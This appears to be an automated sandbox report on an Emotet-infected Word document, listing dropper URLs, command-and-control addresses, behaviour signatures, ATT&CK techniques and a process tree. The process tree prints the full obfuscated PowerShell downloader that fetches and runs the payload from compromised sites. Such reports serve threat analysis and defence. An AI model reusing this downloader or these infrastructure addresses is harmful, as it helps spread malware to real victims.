Analysis

  • max time kernel
    137s
  • resource
    win7v191014
  • submitted
    11-12-2019 05:53

General

  • Target

    Docs_6ad036ba93c94d6976e2d93c7a3aec6f.html.doc

  • Sample

    191211-xf6bzaykg2

  • SHA256

    4ee0bf78e3b0a06c35fed0f912db6fabbb5fae13f838cd4132634359ad0d24da

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://www.prorites.com/wp-content/dsdb28de-kw0ch1msvi-003/

exe.dropper

https://www.silvesterinmailand.com/wp-content/uploads/ibvgux-yg4-03475/

exe.dropper

http://homemyland.net/tmp/wUHdeBS/

exe.dropper

https://www.celbra.com.br/old/wp-content/uploads/2019/mbwl6-lwu0psmcb-523/

exe.dropper

http://prihlaska.sagitta.cz/wp-content/uploads/WwcQXtRta/

Extracted

Family

emotet

C2

200.41.121.69:443

153.190.41.185:80

165.100.148.200:443

103.9.145.19:8080

46.105.128.215:8080

172.105.213.30:80

69.30.205.162:7080

172.104.70.207:8080

198.57.217.170:8080

103.122.75.218:80

212.112.113.235:80

113.52.135.33:7080

60.53.3.153:8080

1.32.54.12:8080

142.93.87.198:8080

91.117.31.181:80

45.129.121.222:443

186.215.101.106:80

143.95.101.72:8080

187.233.220.93:443

rsa_pubkey.plain

Signatures

  • Modifies registry class 136 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Modifies system certificate store 2 TTPs 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_6ad036ba93c94d6976e2d93c7a3aec6f.html.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    PID:1336
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABCAHgAdQBoAGkAaABuAHIAdwBrAHoAbgBiAD0AJwBRAHIAYQBnAGkAcAB4AHcAZwAnADsAJABBAG4AdwBtAGkAdwBiAHUAegBoAHAAIAA9ACAAJwAyADEANgAnADsAJABUAHoAbgBsAG8AaQB5AGoAZgA9ACcASABzAHcAeQBkAGQAdwB5AGcAaQBzAGQAaAAnADsAJABUAG4AcwBlAHIAdABrAGQAegBlAHAAegA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQQBuAHcAbQBpAHcAYgB1AHoAaABwACsAJwAuAGUAeABlACcAOwAkAEEAZwBkAGIAbgBjAHAAYQB0AHMAPQAnAEwAZQBkAGUAYwBsAHYAcwBvAGwAcgB0AHQAJwA7ACQAVwBuAGsAdgB4AHcAYgBhAD0AJgAoACcAbgAnACsAJwBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBCAEMATABpAEUAbgBUADsAJABXAHoAagBsAGkAbABqAGMAZQA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHAAcgBvAHIAaQB0AGUAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGQAcwBkAGIAMgA4AGQAZQAtAGsAdwAwAGMAaAAxAG0AcwB2AGkALQAwADAAMwAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AcwBpAGwAdgBlAHMAdABlAHIAaQBuAG0AYQBpAGwAYQBuAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8AaQBiAHYAZwB1AHgALQB5AGcANAAtADAAMwA0ADcANQAvACoAaAB0AHQAcAA6AC8ALwBoAG8AbQBlAG0AeQBsAGEAbgBkAC4AbgBlAHQALwB0AG0AcAAvAHcAVQBIAGQAZQBCAFMALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGMAZQBsAGIAcgBhAC4AYwBvAG0ALgBiAHIALwBvAGwAZAAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8AMgAwADEAOQAvAG0AYgB3AGwANgAtAGwAdwB1ADAAcABzAG0AYwBiAC0ANQAyADMALwAqAGgAdAB0AHAAOgAvAC8AcAByAGkAaABsAGEAcwBrAGEALgBzAGEAZwBpAHQAdABhAC4AYwB6AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABsAG8AYQBkAHMALwBXAHcAYwBRAFgAdABSAHQAYQAvACcALgAiAHMAcABgAGwAaQB0ACIAKAAnACoAJwApADsAJABNAHkAYgB3AGYAZQBmAGgAcgA9ACcAUgB0AHMAcwBkAGcAdQBlAGwAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFoAbABxAHYAcQBnAHMAZgB4AGoAYwByAGEAIABpAG4AIAAkAFcAegBqAGwAaQBsAGoAYwBlACkAewB0AHIAeQB7ACQAVwBuAGsAdgB4AHcAYgBhAC4AIgBEAG8AYABXAG4ATABgAE8AQQBkAEYAaQBsAEUAIgAoACQAWgBsAHEAdgBxAGcAcwBmAHgAagBjAHIAYQAsACAAJABUAG4AcwBlAHIAdABrAGQAegBlAHAAegApADsAJABEAHAAcgBtAG4AdQBvAHAAPQAnAEUAdgBjAGIAcwB2AGQAdABnACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAVABuAHMAZQByAHQAawBkAHoAZQBwAHoAKQAuACIAbABlAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADcANgA2ADkAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AGEAYABSAHQAIgAoACQAVABuAHMAZQByAHQAawBkAHoAZQBwAHoAKQA7ACQAWQB1AGIAYQB2AGkAbAB6AHAAeQBuAGsAdgA9ACcAVABxAGsAdABiAHcAeABtAHkAJwA7AGIAcgBlAGEAawA7ACQATABrAHIAawBlAHcAcQBlAHIAeABrAD0AJwBHAGUAawBzAGcAaQBzAGYAZwByAGoAZAB3ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAYgBoAGQAbABmAHcAYgBoAGUAPQAnAFUAcgB0AGgAaQBkAGwAbQB4AG0AZQAnAA==
    1⤵
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:2008
    • C:\Users\Admin\216.exe
      "C:\Users\Admin\216.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:1368
      • C:\Users\Admin\216.exe
        --7272c7d5
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        PID:1872
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1548836680-533666437-679457699-1403319995-15752893778627448631697681750379809567"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:2032
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k WerSvcGroup
    1⤵
      PID:1252
    • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
      "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
      1⤵
        PID:828
      • C:\Windows\SysWOW64\boostleel.exe
        "C:\Windows\SysWOW64\boostleel.exe"
        1⤵
        • Suspicious use of WriteProcessMemory
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:2040
        • C:\Windows\SysWOW64\boostleel.exe
          --26b15e59
          2⤵
          • Executes dropped EXE
          • Suspicious behavior: EmotetMutantsSpam
          • Drops file in System32 directory
          • Suspicious use of SetWindowsHookEx
          • Suspicious behavior: EnumeratesProcesses
          PID:2020

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Defense Evasion

      Install Root Certificate

      1
      T1130

      Modify Registry

      1
      T1112

      Discovery

      Query Registry

      1
      T1012

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\216.exe
      • C:\Users\Admin\216.exe
      • C:\Users\Admin\216.exe
      • C:\Windows\SysWOW64\boostleel.exe
      • C:\Windows\SysWOW64\boostleel.exe
      • memory/1336-4-0x00000000060C1000-0x00000000060C5000-memory.dmp
        Filesize

        16KB

      • memory/1336-6-0x00000000060C1000-0x00000000060C5000-memory.dmp
        Filesize

        16KB

      • memory/1336-5-0x00000000060C1000-0x00000000060C5000-memory.dmp
        Filesize

        16KB

      • memory/1336-0-0x0000000005EA0000-0x0000000005EA4000-memory.dmp
        Filesize

        16KB

      • memory/1336-3-0x0000000008EE0000-0x0000000008EE4000-memory.dmp
        Filesize

        16KB

      • memory/1336-2-0x00000000060C1000-0x00000000060C5000-memory.dmp
        Filesize

        16KB

      • memory/1336-1-0x0000000006117000-0x000000000611A000-memory.dmp
        Filesize

        12KB

      • memory/1368-9-0x0000000000290000-0x00000000002A7000-memory.dmp
        Filesize

        92KB

      • memory/1872-11-0x0000000001BE0000-0x0000000001BF7000-memory.dmp
        Filesize

        92KB

      • memory/1872-12-0x0000000000400000-0x0000000000492000-memory.dmp
        Filesize

        584KB

      • memory/2020-16-0x0000000000910000-0x0000000000927000-memory.dmp
        Filesize

        92KB

      • memory/2020-17-0x0000000000400000-0x0000000000492000-memory.dmp
        Filesize

        584KB

      • memory/2040-14-0x0000000000630000-0x0000000000647000-memory.dmp
        Filesize

        92KB